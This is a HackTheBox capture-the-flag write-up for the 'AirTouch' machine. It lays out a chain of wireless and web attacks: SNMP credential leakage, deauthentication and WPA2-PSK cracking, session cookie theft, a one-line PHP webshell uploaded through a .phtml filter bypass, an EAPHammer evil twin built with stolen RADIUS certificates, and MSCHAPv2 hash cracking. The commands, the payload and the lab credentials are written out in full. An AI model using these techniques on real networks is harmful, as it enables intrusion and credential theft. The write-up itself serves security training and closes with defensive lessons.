Post

AirTouch — HackTheBox

AirTouch — HackTheBox

Difficulty: Medium | OS: Linux (Ubuntu 20.04) | Release: January 2026
CVEs: None (wireless misconfiguration chain)
Author: jkonpc | February 27, 2026


Executive Summary

AirTouch is a medium-difficulty Linux machine that simulates a segmented corporate wireless environment across three VLANs. Exploitation chains through SNMP credential leakage, WPA2-PSK handshake capture and cracking, wireless traffic decryption for session hijacking, PHP upload filter bypass, legitimate certificate theft for a WPA2-Enterprise evil twin attack, and MSCHAPv2 hash cracking to pivot across all three network segments for full compromise.

PropertyValue
Target IP10.129.244.98
Open Ports22/tcp (SSH), 161/udp (SNMP)
Network SegmentsConsultant (172.20.1.0/24), Tablets (192.168.3.0/24), Corp (10.10.10.0/24)
User Flagc85a8af90006711db25bfe7084ea368f
Root Flaga99ebcc5f1d3ba156b64be95c0e4eeb9

Attack Chain Overview

  1. Initial Foothold (consultant): SNMP enumeration leaks SSH credentials → root via sudo NOPASSWD: ALL
  2. Tablet VLAN Access: WPA2-PSK handshake capture on AirTouch-Internet → aircrack-ng cracks PSK (challenge) → wireless association to 192.168.3.0/24
  3. Router Compromise (user): Wireless traffic decryption in Wireshark → session cookie theft → cookie manipulation for admin upload access → PHP extension filter bypass (.phtml) → webshell → credential recovery from login.php → SSH as user → user flag
  4. Corp VLAN Access (root): Certificate theft from gateway → EAPHammer evil twin with legitimate certs against AirTouch-Office → MSCHAPv2 hash capture → hashcat crack (r4ulcl:laboratory) → WPA2-Enterprise association to 10.10.10.0/24 → SSH as remotehostapd credential recovery → su adminsudo su → root flag

Phase 1: Reconnaissance

Service Enumeration

A standard TCP scan reveals a minimal attack surface — only SSH is externally accessible:

1
2
3
4
5
$ nmap -sC -sV -p- 10.129.244.98 -Pn

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The UDP Blind Spot

TCP-only scanning is a common pitfall. A targeted UDP probe using onesixtyone reveals SNMP (port 161) with a leaked credential in the system description:

1
2
3
$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.244.98

10.129.244.98 [public] "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
DiscoveryDetail
HostnameAirTouch-Consultant
SSH Credentialsconsultant:RxBlZhLmOkacNWScmZ6D
SourceSNMP sysDescr field via public community string

Phase 1: Exploitation — Establishing the Pivot Point

SSH Access & Local Privilege Escalation

The leaked credentials grant SSH access. The consultant user has unrestricted sudo privileges:

1
2
3
4
5
6
7
8
$ ssh consultant@10.129.244.98

consultant@AirTouch-Consultant:~$ sudo -l
User consultant may run the following commands on AirTouch-Consultant:
    (ALL) NOPASSWD: ALL

consultant@AirTouch-Consultant:~$ sudo su
root@AirTouch-Consultant:~#

Root on the Consultant box is not the objective — it is a prerequisite. Root privileges are required to manipulate wireless interfaces into monitor mode for the attacks ahead.

Network Topology

The home directory contains network diagrams (diagram-net.png) revealing a three-VLAN architecture behind a NAT router:

VLANSubnetSSIDGateway
Consultant172.20.1.0/24Wired (eth0)172.20.1.1
Tablets192.168.3.0/24AirTouch-Internet192.168.3.1
Corporate10.10.10.0/24AirTouch-Office10.10.10.1

The machine exposes seven virtual wireless interfaces (wlan0wlan6) and has EAPHammer pre-installed in /root/eaphammer/, signaling that wireless attacks are the intended pivot mechanism.

Wireless Reconnaissance

Bringing up a wireless interface and scanning reveals the target networks:

1
2
# ip link set wlan0 up
# iw dev wlan0 scan
SSIDBSSIDChannelAuthBand
AirTouch-Internetf0:9f:c2:a3:f1:a71802.1X (Enterprise)2.4GHz
AirTouch-Internetf0:9f:c2:a3:f1:a76WPA2-PSK2.4GHz
AirTouch-Officeac:8b:a9:f3:a1:1344802.1X (Enterprise)5GHz
AirTouch-Officeac:8b:a9:aa:3f:d244802.1X (Enterprise)5GHz

The PSK instance of AirTouch-Internet on channel 6 is the entry point — WPA2-PSK can be cracked with a captured handshake.


Phase 2: Breaching the Tablet VLAN (WPA2-PSK)

Handshake Capture

A monitor-mode interface is configured on channel 6 to capture the WPA2 4-way handshake:

1
2
3
# airmon-ng start wlan3
# iwconfig wlan3mon channel 6
# airodump-ng wlan3mon --channel 6 --bssid f0:9f:c2:a3:f1:a7 -w /tmp/handshake

A deauthentication attack on a separate interface forces the connected tablet client to reconnect, generating the handshake:

1
2
3
# airmon-ng start wlan5
# iwconfig wlan5mon channel 6
# aireplay-ng --ignore-negative-one -0 10 -a f0:9f:c2:a3:f1:a7 -c 28:6C:07:FE:A3:22 wlan5mon

Airodump confirms capture: [ WPA handshake: F0:9F:C2:A3:F1:A7 ]

Cracking the PSK

1
2
3
# aircrack-ng /tmp/handshake-01.cap -w /usr/share/wordlists/rockyou.txt

KEY FOUND! [ challenge ]
CredentialValue
SSIDAirTouch-Internet
PSKchallenge

Connecting to the Tablet VLAN

1
2
3
4
5
# wpa_passphrase "AirTouch-Internet" "challenge" > /tmp/wpa.conf
# wpa_supplicant -B -i wlan4 -c /tmp/wpa.conf
# dhclient wlan4
# ip a show wlan4
    inet 192.168.3.8/24

A host scan of the new subnet reveals the gateway:

1
2
3
4
5
6
7
# nmap -sn 192.168.3.0/24
# nmap -sCV 192.168.3.1

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1
53/tcp open  domain
80/tcp open  http    Apache/2.4.41 (Ubuntu)

Phase 3: Router Exploitation — Lateral Movement

Wireless Traffic Decryption

The router’s web interface at 192.168.3.1 requires credentials we don’t have. Since we possess the WPA2-PSK, we can decrypt captured wireless traffic to steal an authenticated session.

Using the airodump capture file (which must contain both the handshake and subsequent data frames), the traffic is decrypted in Wireshark:

Edit → Preferences → Protocols → IEEE 802.11 → Decryption Keys:

  • Key Type: wpa-psk
  • Key: (hex PSK from wpa_passphrase output)

Filtering on http reveals a tablet client’s requests to the router, including session cookies:

1
Cookie: PHPSESSID=8ufkslsjhr534hh9r3cgmf2cv4; UserRole=user

An SSH local port forward provides browser access to the router:

1
$ ssh -L 8081:192.168.3.1:80 consultant@10.129.244.98

Setting the stolen PHPSESSID cookie in the browser authenticates the session. Modifying UserRole from user to admin via the browser console unlocks the administrative upload feature:

1
document.cookie = "UserRole=admin; path=/";

PHP Filter Bypass

The upload form filters .php extensions. Apache commonly accepts alternative PHP extensions — renaming the payload to .phtml bypasses the filter:

1
<?php system($_GET['c']); ?>

The webshell is accessible at /uploads/shell.phtml and executes as www-data.

Credential Recovery

The webshell reveals hardcoded credentials in the login page source:

1
http://localhost:8081/uploads/shell.phtml?c=cat+/var/www/html/login.php
1
2
'admin'   => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),
'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user'),

User Flag

SSH access to the gateway as user with password admin (a separate local account, not the web credentials) provides the user flag:

1
2
3
4
5
6
7
$ ssh user@192.168.3.1

user@AirTouch-AP-PSK:~$ sudo -l
    (ALL) NOPASSWD: ALL

user@AirTouch-AP-PSK:~$ sudo cat /root/user.txt
c85a8af90006711db25bfe7084ea368f
CredentialValue
SSH Useruser:admin
Web Adminadmin:JunDRDZKHDnpkpDDvay
User Flagc85a8af90006711db25bfe7084ea368f

Phase 4: Evil Twin Attack (WPA2-Enterprise)

Certificate Theft

The gateway’s /root/ directory contains a certificate synchronization script and a backup of the RADIUS server’s TLS certificates:

1
2
3
4
5
6
7
user@AirTouch-AP-PSK:~$ sudo cat /root/send_certs.sh

REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"
1
2
user@AirTouch-AP-PSK:~$ sudo ls /root/certs-backup/
ca.conf  ca.crt  server.conf  server.crt  server.csr  server.ext  server.key

These are the legitimate CA and server certificates used by the AirTouch-Office RADIUS server. With these, an evil twin AP will present a trusted certificate chain, causing enterprise clients to authenticate without warning.

The certificates are transferred to the Consultant box and imported into EAPHammer:

1
# ./eaphammer --cert-wizard import --server-cert ~/server.crt --ca-cert ~/ca.crt --private-key ~/server.key

Evil Twin Execution

EAPHammer is launched on a managed wireless interface, broadcasting AirTouch-Office on channel 44 with the stolen certificates:

1
2
# ip link set wlan6 up
# ./eaphammer --creds -i wlan6 -e "AirTouch-Office" -c 44 --auth wpa-eap

Deauthentication frames are sent from a monitor interface to disconnect clients from the real APs:

1
2
3
# iwconfig wlan2mon channel 44
# aireplay-ng --deauth 10 -a ac:8b:a9:f3:a1:13 wlan2mon
# aireplay-ng --deauth 10 -a ac:8b:a9:aa:3f:d2 wlan2mon

Corporate clients reconnect to the rogue AP and perform PEAP-MSCHAPv2 authentication. EAPHammer captures the challenge/response:

1
2
3
4
5
6
mschapv2:
     domain\username:    AirTouch\r4ulcl
     username:           r4ulcl
     challenge:          60:fc:ec:b9:6b:5c:79:b3
     response:           37:5f:91:83:cc:80:5a:e9:9a:fd:66:57:14:ec:64:0d:a2:eb:ae:0a:1d:ae:5f:ae
     hashcat NETNTLM:    r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3

Cracking MSCHAPv2

1
2
3
4
5
$ hashcat -m 5500 r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3 /usr/share/wordlists/rockyou.txt

r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3:laboratory

Status: Cracked
CredentialValue
Usernamer4ulcl
DomainAirTouch
Passwordlaboratory
SourceMSCHAPv2 capture via evil twin

Phase 5: Corporate VLAN — Root Compromise

WPA2-Enterprise Association

A wpa_supplicant configuration is created for PEAP authentication:

1
2
3
4
5
6
7
8
9
10
11
12
ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
network={
    ssid="AirTouch-Office"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
    phase1="peapver=0"
    phase2="auth=MSCHAPV2"
}
1
2
3
4
# wpa_supplicant -B -i wlan6 -c /tmp/office.conf
# dhclient wlan6
# ip a show wlan6
    inet 10.10.10.10/24

Accessing the Management Host

The remote credentials from send_certs.sh provide SSH access to the Corp VLAN gateway:

1
2
$ ssh remote@10.10.10.1
Password: xGgWEwqUpfoOVsLeROeG

Credential Recovery from hostapd

Standard enumeration on the management host reveals hostapd running the enterprise RADIUS authentication. Inspecting running processes leads to the EAP user database:

1
2
3
4
remote@AirTouch-AP-MGT:~$ cat /etc/hostapd/hostapd_wpe.eap_user

"AirTouch\r4ulcl"   MSCHAPV2   "laboratory"  [2]
"admin"              MSCHAPV2   "xMJpzXt4D9ouMuL3JJsMriF7KZozm7"  [2]

Root Flag

1
2
3
4
5
6
7
remote@AirTouch-AP-MGT:~$ su admin
Password: xMJpzXt4D9ouMuL3JJsMriF7KZozm7

admin@AirTouch-AP-MGT:~$ sudo su

root@AirTouch-AP-MGT:~# cat /root/root.txt
a99ebcc5f1d3ba156b64be95c0e4eeb9

Root Flag: a99ebcc5f1d3ba156b64be95c0e4eeb9


Lessons Learned

SNMP as an Overlooked Attack Surface: The machine’s only TCP port was SSH, which would dead-end most testers who skip UDP enumeration. SNMP’s sysDescr field contained plaintext credentials — a realistic misconfiguration found frequently in enterprise network appliances and IoT devices. Penetration testers should always include UDP scanning (especially ports 161, 500, and 123) in their methodology.

WPA2-PSK Cracking Remains Trivial for Weak Passwords: The AirTouch-Internet PSK (challenge) was cracked from rockyou.txt in under a second. Organizations deploying WPA2-PSK should enforce minimum password length and complexity requirements, or migrate to WPA2-Enterprise for networks carrying sensitive traffic.

Wireless Traffic Decryption with Known PSK: Possessing the WPA2-PSK along with a captured 4-way handshake allows full decryption of wireless traffic for all clients. This enabled session cookie theft without any active man-in-the-middle attack. Networks transmitting sensitive data over WiFi should enforce TLS at the application layer to protect against this class of passive interception.

Certificate Theft Enables Trusted Evil Twins: The initial evil twin attempt with self-signed certificates failed because enterprise clients validated the certificate chain. Only after recovering the legitimate CA and server certificates from the compromised gateway did the attack succeed. This highlights the importance of protecting RADIUS certificates and private keys — if an attacker obtains them, WPA2-Enterprise’s primary advantage over PSK (per-user authentication with mutual certificate validation) is neutralized.

Cleartext Credentials in Configuration Files: The attack chain recovered credentials from SNMP descriptions, PHP source code, shell scripts, and hostapd configuration files. Each credential enabled the next pivot. Secrets management, even in internal infrastructure, should avoid plaintext storage in favor of vaults, environment variables, or encrypted configuration.


Tools Used

ToolPurpose
nmapTCP/UDP service enumeration
onesixtyoneSNMP community string brute-force and enumeration
airmon-ngWireless interface monitor mode management
airodump-ngWireless traffic capture and handshake collection
aireplay-ngClient deauthentication attacks
aircrack-ngWPA2-PSK handshake cracking
wpa_supplicantWPA2-PSK and WPA2-Enterprise network association
dhclientDHCP IP address acquisition
WiresharkWireless traffic decryption and HTTP session analysis
EAPHammerWPA2-Enterprise evil twin AP with credential capture
hashcatMSCHAPv2 (NetNTLMv1) hash cracking
curlWeb application interaction and enumeration
SSH port forwardingTunneling HTTP traffic to attacker browser

CVE Reference

CVEComponentDescription
N/ASNMP ConfigurationPlaintext credentials stored in sysDescr field, accessible via default public community string
N/AAirTouch-InternetWeak WPA2-PSK passphrase (challenge) crackable with standard wordlists
N/APSK Router (Apache/PHP)File upload filter bypass via .phtml extension; hardcoded credentials in login.php; UserRole cookie-based authorization without server-side validation
N/AAirTouch-AP-PSK GatewayRADIUS CA certificate and private key stored in plaintext on gateway; cleartext credentials in send_certs.sh
N/AAirTouch-AP-MGTCleartext user credentials in hostapd_wpe.eap_user configuration file
This post is licensed under CC BY 4.0 by the author.